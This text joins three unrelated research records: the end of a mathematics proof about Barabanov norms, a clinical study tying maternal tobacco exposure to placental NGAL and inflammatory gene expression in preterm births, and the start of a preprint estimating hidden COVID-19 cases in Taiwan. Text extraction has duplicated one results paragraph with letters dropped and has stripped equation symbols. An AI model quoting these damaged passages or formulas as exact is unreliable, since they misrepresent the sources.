For the rest of the proof let us fix an arbitrary pair of matrices (B 1 , B 2 ) ∈ V. Define C := B 2 − A 2 ∈ B ε . It is straightforward to see that sup{ B C : B ∈ B n } = ρ(B 2 ) n for every n ≥ 1 and therefore ̺(B) = ρ(B 2 ). Since ρ(B 2 ) −1 B 2 is an isometry of R 2 with respect to the norm · C , and B 1 C < ρ(B 2 ) = ̺(B), it follows directly that · C is a Barabanov norm for B.
Let us suppose first that the eigenvalues of ρ(B 2 ) −1 B 2 are not roots of unity. In this case ρ(B 2 ) −1 S(C) −1 B 2 S(C) is a matrix corresponding to rotation through an irrational angle. It follows that every rotation matrix is a limit point at infinity of the sequence (̺(B) −n S(C) −1 B n 2 S(C)) ∞ n=1 , and so S(C) −1 S(B)S(C) contains the group of rotation matrices. We deduce that B satisfies the hypotheses of Theorem 2.1 and conclude that · C is the unique Barabanov norm of B. Now let us suppose instead that the eigenvalues of ρ(B 2 ) −1 B 2 are roots of unity. Similarly to examples 1 and 2 in the previous section, there exist uncountably many norms on R 2 which are preserved by the rational-angle rotation matrix ρ(B 2 ) −1 S(C) −1 B 2 S(C) and are not proportional to one another or to the Euclidean norm. Modifying these norms by composition with S(C) −1 as in the definition of the norm · C , we obtain an uncountable family of norms on R 2 which are preserved by ρ(B 2 ) −1 B 2 and are not proportional to one another or to · C . Let ||| · ||| be any such norm. We will show that for every sufficiently small real number κ > 0, the norm on R 2 given by |||v||| * := v C + κ|||v||| is a Barabanov norm for B. By repeating this procedure using a different norm ||| · ||| which is also preserved by ρ(B 2 ) −1 B 2 , or indeed by simply varying the constant κ within its permitted range, it is clear that we may obtain an uncountable family of Barabanov norms for B which are not pairwise proportional to one another.
Acknowledgment
This research was conducted as part of the ERC grant MALADY (246953). | 2011-09-21T20:24:39.000Z | 2011-09-21T00:00:00.000 | {
"year": 2011,
"sha1": "a04fba477d5f729c443a910c9bd5fac11d3ccf4e",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/1109.4649",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "a04fba477d5f729c443a910c9bd5fac11d3ccf4e",
"s2fieldsofstudy": [
"Mathematics"
],
"extfieldsofstudy": [
"Mathematics",
"Computer Science"
]
} |
247378766 | pes2o/s2orc | v3-fos-license | Placental Neutrophil Infiltration Associated with Tobacco Exposure but Not Development of Bronchopulmonary Dysplasia
Objective: In utero inflammation is associated with bronchopulmonary dysplasia (BPD) in preterm infants. We hypothesized that maternal tobacco exposure (TE) might induce placental neutrophil infiltration, increasing the risk for BPD. Study design: We compared the composite outcome of BPD and death in a prospective pilot study of TE and no-TE mothers and their infants born <32 weeks. Placental neutrophil infiltration was approximated by neutrophil gelatinase-associated lipocalin (NGAL) ELISA, and total RNA expression was analyzed via NanoString© (Seattle, WA, USA). Result: Of 39 enrolled patients, 44% were classified as tobacco exposure. No significant difference was noted in the infant’s composite outcome of BPD or death based on maternal tobacco exposure. NGAL was higher in placentas of TE vs. non-TE mothers (p < 0.05). Placental RNA analysis identified the upregulation of key inflammatory genes associated with maternal tobacco exposure. Conclusion: Tobacco exposure during pregnancy was associated with increased placental neutrophil markers and upregulated inflammatory gene expression. These findings were not associated with BPD.
Introduction
Tobacco exposure (TE) during pregnancy is highly prevalent in the United States. As reported by the Center for Disease Control and Prevention (CDC) in 2016, 7.2% of mothers smoked cigarettes during pregnancy [1]. It is well recognized that maternal tobacco use during pregnancy is linked to many negative outcomes for infants, including low birthweights, preterm birth, preterm prolonged rupture of membrane (PPROM), and other birth defects [2][3][4][5].
Recently, Antonucci et al. indicated that in utero exposure to smoking is an independent risk factor for the development of bronchopulmonary dysplasia (BPD) in premature infants born weighing less than 1500 g [6]. BPD is the most prevalent sequela of preterm birth, affecting 10,000-15,000 infants annually in the United States [7]. Known postnatal risk factors for the disease include hyperoxia, mechanical ventilation, patent ductus arteriosus (PDA), and sepsis; antenatal risk factors include chorioamnionitis, preeclampsia, and hypertension [8][9][10][11][12].
Neutrophil gelatinase-associated lipocalin (NGAL) is a glycoprotein found predominantly in neutrophil granules. NGAL is normally expressed at low levels but is often elevated in the blood, bronchoalveolar lavage (BAL) fluid, and sputum in adults with lung diseases, such as asthma and chronic obstructive pulmonary disease (COPD) [13]. Notably, serum levels of NGAL at birth are significantly higher in preterm infants who develop BPD
Materials and Methods
Study design: This pilot prospective, observational study was conducted between October 2018 and December 2019 and was approved by the Institutional Review Board at the University of Oklahoma Health Sciences Center (OUHSC). Written informed consent was obtained for the mother and newborn either prior to delivery or within 24 h post-delivery. Following consent, a 9-item maternal questionnaire for self-identification of tobacco exposure during pregnancy was completed ( Figure A1). Our maternal questionnaire on tobacco use was internally validated in a previous study, where cotinine levels (a nicotine metabolite) were detectable only in mothers who reported tobacco exposure [21]. Patients were stratified into two groups: TE mothers and non-TE mothers.
Study population: Participants included mothers and their preterm infants born at a gestational age of <32 weeks. Infants were excluded based on known major congenital anomalies, maternal concern for infection (e.g., clinical chorioamnionitis), maternal fever >38 • C 24 h before delivery, presence of meconium-stained fluid, maternal history of impaired immunity, or a concomitant medical condition impacting inflammatory response.
Data collection: Data were de-identified and prospectively collected and managed using a data collection sheet at OUHSC. Maternal and neonatal demographic characteristics were collected via chart review. The secondary outcome was a composite of BPD or death endpoints. BPD status was assessed at 36 weeks postmenstrual age (PMA) using the National Institutes of Health (NIH) workshop definition [22]. Mild BPD is defined as breathing room air at 36 weeks corrected or time of discharge, moderate BPD is defined as needing <30% oxygen at 36 weeks corrected/discharge, whereas severe BPD is defined as needing >30% O2 at 36 weeks corrected age/discharge. For the purpose of this study, infants were defined as having the presence or absence of BPD; absence of BPD was defined as no or mild BPD, and the presence of BPD was defined as moderate to severe BPD [22]. Additional outcomes included necrotizing enterocolitis (NEC), intraventricular hemorrhage (IVH), retinopathy of prematurity (ROP), PDA, and sepsis. A mother was considered to have received antenatal corticosteroids if she received a full or partial betamethasone or dexamethasone course. Intrauterine growth restriction (IUGR) was defined as intrauterine estimated fetal weight less than the 10th percentile. PPROM was defined as having membranes ruptured for more than 18 h. Samples from the placenta from both groups were evaluated for histological chorioamnionitis by one of two pathologists blinded to maternal tobacco exposure status. Positive tobacco exposure was defined as maternal 'daily' to 'almost daily' active smoking or 'daily' to 'almost daily' secondhand smoke exposure, as reported on the maternal tobacco exposure questionnaire ( Figure A1).
To determine the contribution of tobacco exposure to the development of BPD, the groups were further subdivided into (1) TE mothers with infants developing BPD (BPD TE group); (2) non-TE mothers with infants developing BPD (BPD No TE group); (3) TE mothers with infants not developing BPD (No BPD TE group); and (4) non-TE mothers with infants not developing BPD (No BPD No TE group).
Sample collection: Fresh placenta tissue samples were collected within 24 h of delivery. Three full-thickness sections of placenta parenchyma (including fetal and maternal surfaces), one section of extraplacental membrane roll, and two sections of the umbilical cord (proximal and distal) were collected and fixed in 10% formalin for routine histopathological examination and diagnosis. One full-thickness section was split and preserved for both RNA analysis (RNAlater™, Invitrogen, Carlsbad, CA, USA) and protein analysis (snap-frozen in liquid nitrogen). All samples were stored at −80 • C until further analysis.
Immunohistochemistry (IHC): IHC was performed according to the manufacturer's protocols using a Leica Bond-IIITM Polymer Refine Detection System (DS 9800). Formalinfixed paraffin-embedded (FFPE) tissues were sectioned at the desired thickness (4 µm) and mounted on positively charged slides. The slides were dried overnight at room temperature and incubated at 60 • C for 45 min, followed by deparaffinization and rehydration in an automated multi-stainer (Leica ST5020). Subsequently, slides were transferred to the Leica Bond-IIITM and treated for antigen retrieval at 100 • C for 20 min in a retrieval solution, at either pH 6.0 or 9.0. Endogenous peroxidase was blocked using a peroxidaseblocking reagent, followed by 60 min of incubation with NGAL antibody (Catalog #711280, ThermoFisher Scientific, Waltham, MA, USA) diluted 1:100. Post-primary IgG-linker and/or poly-HRP IgG reagents were used as the secondary antibody. Detection was accomplished via the chromogen 3,3 -diaminobenzidine tetrahydrochloride (DAB), and counterstained with hematoxylin. Completed slides were dehydrated (Leica ST5020) and mounted (Leica MM24). The antibody-specific positive control and negative control (omission of primary antibody) were parallel stained. Additionally, two pathologists blinded to smoking and BPD status semi-quantitatively scored based on anatomical location, with scores from zero to four: score '0 signifying no staining; score '1 for 1-10 positive cells/per high power field (HPF); score '2 for 11-50 positive cells/HPF; score '3 for 51-75 positive cells/HPF; and score '4 for >75/HPF. Protein analysis and enzyme-linked immunosorbent assay (ELISA): ELISA was used to quantify NGAL (Catalog #036RUO, BioPorto Diagnostics A/S, Hellerup, Denmark) following the manufacturer's instructions. Briefly, frozen placental tissue was mechanically homogenized using a BeadBeater (Next Advance Inc., Troy, NY, USA) in a buffer containing phosphatase, protease inhibitors (Catalog #524625 and #535140, Millipore, Burlington, MA, USA) and PMSF (Sigma-Aldrich, St. Louis, MO, USA). Results were normalized to total protein concentration determined by bicinchoninic acid (BCA) assay (Catalog #23227, Pierce Biotechnology, Rockford, IL, USA).
Total RNA analysis/NanoString©: A random subset of 12 patients from the four subgroups (n = 3/group): BPD, TE group; BPD, no TE group; no BPD, TE group; and no BPD, no TE group. A BeadBeater was used to homogenize placental tissue mechanically. Total RNA was extracted per the manufacturer's protocols using a Zymo Quick-RNA MidiPrep kit (Catalog #R1056, Zymo Research, Irvine, CA, USA). Total RNA, between 25 ng and 300 ng, was loaded onto a nCounter ® Human Immunology v2 Panel (Catalog #XT-CSO-HIM2-12, NanoString, Seattle, WA, USA). This panel consisted of 594 genes of interest and 15 internal reference genes. Data were analyzed using nCounter Analysis and nCounter Advanced Analysis software. RCC output files were imported into NanoString nSolver 4.0. Default quality control (QC) settings were used to verify the quality of all data (>95% of fields of view [FOV] and binding densities between 0.2 and 0.5). The background was corrected by subtracting the mean value of 8 engineered RNA negative control sequences from the raw counts of all genes. The geometric mean was calculated for the 15 housekeeping genes, and the nine genes with the lowest coefficient of variation were used to normalize the data. Genes with mean normalized counts of less than 50 were excluded from the analysis. The control group was defined as No TE or No BPD No TE for subgroup analysis. Gene expressions are estimated to have a log2-fold change, holding all other variables constant. The 95% confidence intervals (CI) for the log2-fold change and the p values are reported. A 1.2-fold change was selected as the differential threshold.
Given the unpredictable nature of preterm deliveries, we allowed up to 24 h for placenta collection. Once collected, the placenta was immediately placed at 4 • C. The pathologist then collected full-thickness sections and stored these at −80 • C or preserved with RNAlaterTM. Although we allowed up to 24 h for placenta collection in our protocol, the majority of samples were collected within 2-12 h. This methodology allows for collection of high-quality RNA from placentas stored at 4 • C or even room temperature for up to 48 h prior to being transferred to stabilizing solution, such as RNAlaterTM [23].
Statistical methods: Our study is a pilot/preliminary study on a topic where there is little known on the association between inflammation within the placenta and development of BPD in preterm neonates. While we have directional hypotheses, we felt it would be inappropriate to quantify an effect size given the paucity of research on the topic. Descriptive statistics were computed for demographic and clinical variables. Comparisons of categorical variables between patients developing BPD or death and those who did not were evaluated with Fisher's exact test. Continuous variables were assessed for normality, then compared between groups using a Kruskal-Wallis test or Student's t-test, as appropriate. Frequencies and percentages were reported for categorical variables across BPD status. Count means and standard deviations are reported for continuous variables. Statistical significance is defined, in all experiments, as p < 0.05.
Results
In total, 95 mothers were screened, and 49 mothers were approached for study enrollment based on the inclusion and exclusion criteria. Eight mothers declined and two approached mothers aged out of this study (delivered baby >32 weeks gestation). Demographic characteristics for the remaining 39 patients were stratified by the presence and absence of tobacco exposure (Table 1), as well as by the presence or absence of the composite outcome of BPD or death (Table A1). Of enrolled mothers, 43.6% reported tobacco exposure during pregnancy (Tables 1 and A2). Of these tobacco exposure mothers, two reported the exposure was via secondhand smoke.
No differences in birth weight, birth length, head circumference, gestational age, gender, maternal ethnicity, antenatal steroid, mode of delivery, intubation in delivery room, intubated in NICU, PDA medical or surgical treatment, IVH grade 3 or 4, ROP, IUGR <10th percentile, or death or BPD were noted with maternal tobacco exposure. There was an association with maternal age (p = 0.048), with tobacco exposure mothers being slightly older (Table 1). When comparing tobacco exposure mothers, no differences in diabetes status, maternal hypertension, prolong rupture of membranes, chorioamnionitis, antepartum hemorrhage, marijuana, or other illicit drug use were present (Table 2). No differences in the incidence of NEC, or sepsis based on maternal tobacco exposure were noted.
As expected, infants with the composite outcome of BPD or death had significantly lower (p < 0.001) birth weight, length, head circumference, and gestational age compared with the No BPD group. Additionally, more infants in the composite outcome required intubation in the delivery room (p = 0.001) or the NICU (p < 0.001), required medical management of PDA (p = 0.01), and developed threshold ROP (p = 0.017) compared to the No BPD group (Table A1). The remainder of the maternal and neonatal demographic characteristics did not differ between groups. From the maternal perspective, we found no significant association between tobacco exposure status and maternal complications, with the exception of increased incidence of antepartum hemorrhage in the composite outcome group (p = 0.003) (Table A2). While there was no association between maternal tobacco exposure and an infant's risk for developing BPD, IHC of placental tissues showed a higher expression of NGAL in the fetal surfaces and upper portion of the placenta parenchyma of tobacco exposure mothers ( Figure 1A,C) compared to those of No TE ( Figure 1B,D) mothers. The IHC for the BPD TE group ( Figure 1A) showed higher expression of NGAL as compared to the BPD No TE group ( Figure 1B). Regardless of BPD status, NGAL was highly expressed in the TE groups (BPD TE and No BPD TE) compared to the No TE group (BPD No TE and No BPD No TE). Additionally, NGAL intensity staining scores were higher in the chorionic plate and subchorionic space of placentas from tobacco exposure mothers, regardless of BPD status, though these differences did not reach statistical significance ( Figure 1E,G; p = 0.065 and p = 0.091, respectively).
While there was no association between maternal tobacco exposure and an infant' risk for developing BPD, IHC of placental tissues showed a higher expression of NGA in the fetal surfaces and upper portion of the placenta parenchyma of tobacco exposur mothers ( Figure 1A,C) compared to those of No TE ( Figure 1B,D) mothers. The IHC fo the BPD TE group ( Figure 1A) showed higher expression of NGAL as compared to th BPD No TE group ( Figure 1B). Regardless of BPD status, NGAL was highly expressed i the TE groups (BPD TE and No BPD TE) compared to the No TE group (BPD No TE an No BPD No TE). Additionally, NGAL intensity staining scores were higher in the chori onic plate and subchorionic space of placentas from tobacco exposure mothers, regardles of BPD status, though these differences did not reach statistical significance ( Figure 1E,G p = 0.065 and p = 0.091, respectively). To confirm these histological findings, NGAL ELISA was performed in each of the four subgroups. As shown in Figure 2A, NGAL levels were significantly higher in the placentas of tobacco exposure compared to No TE mothers (p < 0.0001). Further subgroup analysis based on BPD outcomes showed that NGAL levels were significantly higher in infants of the BPD TE group compared to No BPD No TE infants ( Figure 2B, p < 0.01). Notably, BPD No TE group also had significantly higher levels of NGAL as compared to No BPD No TE infants ( Figure 2B, p < 0.001). Altogether, these data suggest that tobacco exposure during pregnancy is associated with increased neutrophil activation/infiltration in the placenta, and levels of neutrophil activation/infiltration are increased further still in the placentas of tobacco exposure infants developing BPD.
Next, the immune placental transcriptome from a subset of infants from all four subgroups was profiled using the NanoString nCounter™ Immunology Panel. Comparing BPD TE to No BPD No TE, 22 genes were significantly differentially expressed (Table 3) out of a total of 594 genes of potential interest (Table A3). Notably, transcript levels for the chemokines IL8 and CXCL10, the inflammatory molecules SA100A8/9, and the receptor CD44 were significantly upregulated in BPD TE compared to No BPD No TE infants (Table 3; p < 0.05), influencing cell signaling and inflammatory cytokine pathways (e.g., Figure A2). No other significant differences were found between the groups. We further compared the subgroups based on the neonatal outcome of BPD. Similarly, gene expression for CXCL8, CXCL10 were upregulated in the TE BPD group compared to no TE no BPD group.
infants of the BPD TE group compared to No BPD No TE infants ( Figure 2B, p < 0.01). Notably, BPD No TE group also had significantly higher levels of NGAL as compared to No BPD No TE infants ( Figure 2B, p < 0.001). Altogether, these data suggest that tobacco exposure during pregnancy is associated with increased neutrophil activation/infiltration in the placenta, and levels of neutrophil activation/infiltration are increased further still in the placentas of tobacco exposure infants developing BPD. Next, the immune placental transcriptome from a subset of infants from all four subgroups was profiled using the NanoString nCounter™ Immunology Panel. Comparing BPD TE to No BPD No TE, 22 genes were significantly differentially expressed (Table 3) out of a total of 594 genes of potential interest (Table A3). Notably, transcript levels for the chemokines IL8 and CXCL10, the inflammatory molecules SA100A8/9, and the receptor CD44 were significantly upregulated in BPD TE compared to No BPD No TE infants (Table 3; p < 0.05), influencing cell signaling and inflammatory cytokine pathways (e.g., Figure A2). No other significant differences were found between the groups. We further compared the subgroups based on the neonatal outcome of BPD. Similarly, gene expression for CXCL8, CXCL10 were upregulated in the TE BPD group compared to no TE no BPD group.
Discussion
Bronchopulmonary dysplasia, a disease primarily affecting preterm infants, can be a challenge to manage both acutely and in the long term, as there are many persistent complications affecting patients and their families [24,25]. In this study, we sought to investigate whether tobacco exposure during pregnancy is a risk factor for developing BPD. Specifically, we questioned whether neutrophil activation/infiltration occurs in the placentas of tobacco exposure mothers and if this infiltration of neutrophils to the placenta is associated with the development of BPD or death, as a composite outcome, in preterm infants.
NGAL, neutrophil gelatinase-associated lipocalin, is a 25 kDa lipocalin originally purified from activated human neutrophils. This molecule is now known to be secreted by a variety of immune cells, hepatocytes, adipocytes, and renal tubular cells [26]. In the placenta, NGAL staining has been associated with inflammation and intra-amniotic infections [26]. NGAL levels in the plasma have also been associated with the development of BPD in preterm infants [14]. In this study, we showed for the first time that NGAL staining and NGAL protein levels are higher in the placentas of tobacco exposure mothers compared to those of No tobacco exposure mothers. Using IHC, NGAL staining was specifically high in the amniochorionic membrane and intervillous space, suggesting the presence of neutrophil activation on both the maternal and fetal surfaces. Levels of NGAL measured by ELISA in placenta homogenates were higher in BPD tabacco exposure infants compared to No BPD tobacco exposure infants. Notably, we found no difference in pathologically diagnosed chorioamnionitis or funisitis between the BPD and No BPD groups, suggesting that the observed elevated NGAL levels could be secondary to maternal tobacco exposure.
The potential physiological mechanisms associating maternal tobacco exposure with increased placental NGAL are currently unknown. However, it is reasonable to assume that tobacco exposure during pregnancy results in increased inflammation and immune cell activation, both systemically and at the placenta [27]. Immune cell activation would result in the release of inflammatory cytokines and chemotactic factors [28], potentially affecting the maturation of the fetal lungs. Previous studies have confirmed an association of elevated levels of pro-inflammatory cytokines (interleukin 6 [IL-6], tumor necrosis factor-alpha [TNF-α], IL-1β, and IL-8) in amniotic fluid 5 days preceding delivery with the development of BPD, suggesting that the mechanism responsible for BPD may begin before birth [29].
To determine if tobacco exposure is associated with increased inflammation in the placenta, we profiled the placental tissues as from tobacco exposure and no tobacco exposure mothers using the nCounter ® Immunology NanoString Panel, which includes over 500 immunology genes involved with activation of the inflammatory cascade, including neutrophils, natural killer cell, B cell, and T cell activation, as well as various genes responsible for complement activation. Notably, IL8 and CXCL10 mRNA were significantly upregulated in tobacco exposure compared to no tobacco exposure placenta. Both genes encode chemokines known to recruit immune cells, including neutrophils, and are associated with inflammation in the placenta [28,30]. Additionally, the SA100A8 and SA100A9 genes, upregulated in tobacco exposure placentas, encode inflammatory proteins previously shown to play a role in pregnancy loss and other complications, such as preeclampsia [31]. These expression differences further support our suggestion that maternal tobacco exposure is associated with placental inflammation, at least at the transcript level.
Surprisingly, we found no association between maternal tobacco exposure and the incidence of BPD in preterm infants born <32 weeks gestation. This lack of association could be due to the small sample size, as well as a multitude of factors known to be involved in the pathogenesis of BPD [24]. Though a previous study showed a potential association of BPD with maternal tobacco exposure, the majority of the literature indicates that maternal smoking during pregnancy is not an independent risk factor for BPD development, after controlling for additional variables [6,8,32,33]. With the exception of antepartum hemorrhage incidence, which was significantly higher in the composite outcome group compared to the No BPD group (46.7% vs. 4.2%; p = 0.003), we found no difference in known risk factors for BPD, including maternal hypertension, PPROM, and chorioamnionitis [8][9][10][11][12]. In line with other studies [7], infants with the composite outcome of BPD or death had a lower gestational age and birth weight compared to infants in the No BPD group. Composite outcome infants also required more medical interventions, such as intubation after birth, medical management of PDA, and development of threshold ROP.
Our pilot study is subject to several limitations. First, maternal tobacco exposure status was based on a self-reported questionnaire rather than biochemical measurement, such as levels of cotinine, a nicotine metabolite. We previously showed that serum cotinine levels were significantly higher in cord blood of self-reported smokers than in cord blood of non-smokers, suggesting that self-reporting smoking status could be adequate in our patient population [21]. Secondly, we did not account for the amount of tobacco exposure (e.g., number of cigarettes smoked per day, or passive versus active smoking) in our results. It is possible that active smoking has a stronger association with placental pathology than passive tobacco exposure. Third, due to the small sample size, we focused on the clinically relevant outcome of moderate to severe BPD and did not adjust for the multiple confounding variables that contribute to the development of BPD. Lastly, our focus in this study was primarily on neutrophil activation. We did not evaluate the effect of tobacco exposure on activation or placental infiltration of other leukocytes.
Our studies provide direct evidence that maternal tobacco exposure leads to neutrophil infiltration into the placenta. One possible implication of this observation is an increased inflammatory environment which could amplify other risk factors, chorioamnionitis, preeclampsia, high oxygen or mechanical ventilation, resulting in the development of BPD [16]. Additional studies need to be carried out focusing on other leukocytes present in the placenta and the cytokines the neonate is exposed to that could contribute to inflammatory injury in the developing lungs. Further, an additional larger study should be carried out to determine if an increase neutrophil infiltration into the placenta due to tobacco exposure is predictive of BPD.
Conclusions
In conclusion, our studies provide direct evidence that maternal tobacco exposure leads to neutrophil infiltration into the placenta. One possible implication of this observation is an increased inflammatory environment which could amplify other risk factors, chorioamnionitis, preeclampsia, high oxygen or mechanical ventilation, resulting in the development of BPD [16]. Additional studies need to be carried out focusing on other leukocytes present in the placenta and the cytokines the neonate is exposed to that could contribute to inflammatory injury in the developing lungs. Further, an additional larger study should be carried out to determine if an increase neutrophil infiltration into the placenta due to tobacco exposure is predictive of BPD. All data are presented as the mean ± standard deviation or n (%). BPD-bronchopulmonary dysplasia, NICU-neonatal intensive care unit, PDA-patent ductus arteriosus, IVH-intraventricular hemorrhage, ROPretinopathy of prematurity, and IUGR-intrauterine growth restriction. | 2022-03-11T16:22:04.704Z | 2022-03-01T00:00:00.000 | {
"year": 2022,
"sha1": "779279ea9de1c231bae29629b29770f845df7cec",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2227-9067/9/3/381/pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "58bb823b7b735ab62e6e5422d4b003258cb3ff17",
"s2fieldsofstudy": [
"Medicine",
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
240225430 | pes2o/s2orc | v3-fos-license | Assessment of the fatality rate and transmissibility taking account of undetected cases during an unprecedented COVID-19 surge in Taiwan
Background During the COVID-19 outbreak in Taiwan between May 11 and June 20, 2021, the observed fatality rate (FR) was 5.3%, higher than the global average at 2.1%. The high number of reported deaths suggests that hospital capacity was insufficient. However, many unexplained deaths were subsequently identified as cases, indicating that there were a few undetected cases, hence resulting in a higher estimate of FR. Knowing the number of total infected cases can allow an accurate estimation of the fatality rate (FR) and effective reproduction number (Rt). Methods After adjusting for reporting delays, we estimated the number of undetected cases using reported deaths that were and were not previously detected. The daily FR and Rt were calculated using the number of total cases (i.e. including undetected cases). A logistic regression model was developed to predict the detection ratio among deaths using selected predictors from daily testing and tracing data. Results The estimated true daily case number at the peak of the outbreak on May 22 was 897, which was 24.3% higher than the reported number, but the difference became less than 4% on June 9 and afterward. After taking account of undetected cases, our estimated mean FR (4.7%) was still high but the daily rate showed a large decrease from 6.5% on May 19 to 2.8% on June 6. Rt reached a maximum value of 6.4 on May 11, compared to 6.0 estimated using the reported case number. The decreasing proportion of undetected cases was associated with the increases in the ratio of the number of tests conducted to reported cases, and the proportion of cases that are contact-traced before symptom onset. Conclusions Increasing testing capacity and tracing efficiency can lead to a reduction of hidden cases and hence improvement in epidemiological parameter estimation.
Introduction 49
Knowing the actual number of coronavirus disease 2019 (COVID-19) cases throughout an 50 outbreak is critical to provide an accurate estimate of epidemiological parameters such as the 51 fatality rate (FR) and effective reproduction number ( ! ). These parameters aid in making 52 proper public health decisions, assessing health care system performance, and predicting the 53 trend of COVID-19 spread. However, the number of undetected cases can be large and may 54 vary during an outbreak. Limited capacities for contact tracing and testing often result in 55 underestimation of true infections 1,2 . The proportion of undetected cases may reduce after such 56 capacities improve. Hence, estimating this constantly changing proportion of undetected cases 57 throughout an outbreak is important. 58 After several months of zero confirmed community-acquired cases, quarantine exemption for 59 flight crews, and super spreader events in tea parlors in Wanhua in Taipei in late April and 60 early May 2021, triggered a fresh wave of local spread of the Alpha variant 3 . This resulted in 61 14,005 total reported cases between May 11 and June 20, 2021 4 . Approximately 5% of cases 62 resulted in death, which was a higher case fatality rate (CFR) compared to the global rate 63 (obtained by dividing the total number of deaths by the total number of cases worldwide), 64 which has been consistently below 2.5% since November 16, 2020 5 . Whether this high CFR 65 was mainly because of insufficient hospital capacity and treatment, or a massive proportion of 66 undetected cases was unknown. 67 Early in the outbreak, testing capacity was insufficient to cope with the rising cases among 68 initial transmission clusters. The daily number of new cases grew to more than 200 within a 69 week and continued to increase until reaching a plateau at the end of May 2021 (i.e., 596 cases 70 on average per day from May 22 to 28). Because of the emerging outbreak, Taiwan had been 71 under Level 2 alert since May 11, 2021 6 , followed by escalation to Level 3 restrictions on May 72 19, 2021 7 , under which people are required to wear masks outdoors, gatherings of more than 73 four people indoors and more than nine people outdoors are banned, and all schools are closed. 74 Social distancing measures reduced individual mobility 8 and effectively lowered ! . At the 75 same time, the daily number of tests conducted continued to increase, presumably allowing 76 more cases to be identified. 77 During the outbreak, many confirmed cases failed to be detected when alive but were tested 78 because of their death, indicating that a certain number of undetected cases existed. The number 79 of undetected cases who eventually died (referred to as undetected deaths), together with the 80 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint
Data sources 96
We collected the date of symptom onset time and testing date for each reported death of 97 COVID-19 from May 28 to July 22, 2021 from Taiwan Centers for Disease Control 9 . The 98 daily number of deaths reported before May 28 was obtained from the media. Daily number of 99 confirmed cases was collected from Taiwan National Infectious Disease Statistics System 4 . 100 We collected the daily number of tests conducted from the Government Information Open 101 Platform, Taiwan 10,11 . 102
Estimating true total cases and fatality rate 103
Deaths from COVID-19 were classified into two categories, detected and undetected deaths, 104 depending on whether testing was performed before the death or not, respectively (see the 105 schema in Figure 1A). To estimate the number of true total cases, we first considered the 106 following ratio of undetected to detected deaths using the numbers of detected and undetected 107 cases and their respective FR: 108 where # refers to the number of detected deaths, while "# refers to the number of undetected 110 deaths; # ( ) and "# ( ) represent the number of cases that are detected and undetected at day 111 , respectively. Note that refers to the reporting date for detected cases or detected deaths; 112 For undetected cases or undetected deaths, refers to the adjusted reporting date such that the 113 reporting delay (i.e., the time elapsed between symptom onset and reporting) is adjusted to be 114 the same as that of detected cases. Thus, # ( ) represents the number of deaths among the 115 detected cases who are reported at day . Similarly, "# ( ) is the number of deaths among the 116 undetected cases whose adjusted reporting date is at day . # ( ), which is likely to be 117 affected by the change in hospital capacity or treatment, represents the daily FR among the 118 detected cases at day .
"# represents the FR among the undetected cases. "# was 119 assumed to be a constant, estimated as the average # ( ) during the initial two weeks (from 120 May 11 to May 24) of the outbreak when the hostpital capacity or treatment was not sufficient. 121 Undetected deaths who are tested later are identified as "late-detected" cases ( $# ) (See Figure 122 1A). We back-projected the number of late-detected cases from their late reporting time to their 123 adjusted reporting date 12 , using the mean and standard deviation of the reporting delay 124 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint among detected cases. Our aim was to estimate "# ( ). After rearrangement, the following 125 formula was derived: 126 The value can be solved because all of the terms on the right are either known or can be 128 estimated. We assumed that most of the undetected deaths were identified as "late-detected" 129 cases ( $# ). Therefore, the number of undetected deaths was approximated by the number of 130 late-detected cases ( "# ≈ $# ) and then the ratio # "! (!) was obtained. At the same time, the 131 proportion of detected deaths (i.e., the detection ratio among death cases; ) was also 132 calculated. Finally, the true number of total cases was derived empirically as the sum of 133 detected and undetected cases (i.e., # + "# ). Note that these ratios among deaths were also 134 predicted by a regression model using data related to testing and tracing and hence a model-135 predicted number of total cases was obtained (see later sections). 136 The FRs of reported cases (including both detected and late-detected cases; # + $# ) and total 137 cases were estimated at the reporting time (or the adjusted reporting time for undetected cases) 138 using the following equations. 139 (3) 140 (4) 141 ()*+(!)# is commonly known as the case fatality rate, and !+!,$ is the infection fatality 142 rate. 143
Estimating the proportion of detected deaths using a predictive model 144
We predicted the detection ratio among death cases using daily values of five indicators related 145 to testing, tracing, and hospital capacities as candidate predictors. These indicators are: the 146 proportion of cases without contact tracing delay, ratio of the number of tests conducted to 147 reported cases, testing delay, reporting delay and death delay (for definitions, see Error! 148 Reference source not found.). We calculated the delay periods in testing, reporting and death 149 by subtracting adjusting for the date of symptom onset from the dates of these three events. 150 Testing (the first test) earlier or on the same day as symptom onset implied that cases were 151 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint contact-traced without delay. If cases were tested after symptom onset, they were either 152 contact-traced with delay or were not contact-traced. The proportion of death cases that were 153 contact-traced without delay was calculated. 154 To investigate the factors that influence the proportion of detected deaths, we developed a 155 logistic regression model. We assumed that the number of deaths that were previously detected 156 on day follows a binomial distribution, i.e. # ( )~< ( ), ( )>, where ( ) = 157 is the expected proportion of detected deaths on day . 158 The full predictive model is: 159 where !. is the daily ratio of tests conducted to reported cases; 0!# represents the daily 161 proportion of cases (among detected deaths) without contact tracing delay. # , # and # are 162 daily reporting, testing and death delays, respectively. is the intercept and 4 is the regression 163
Model selection 168
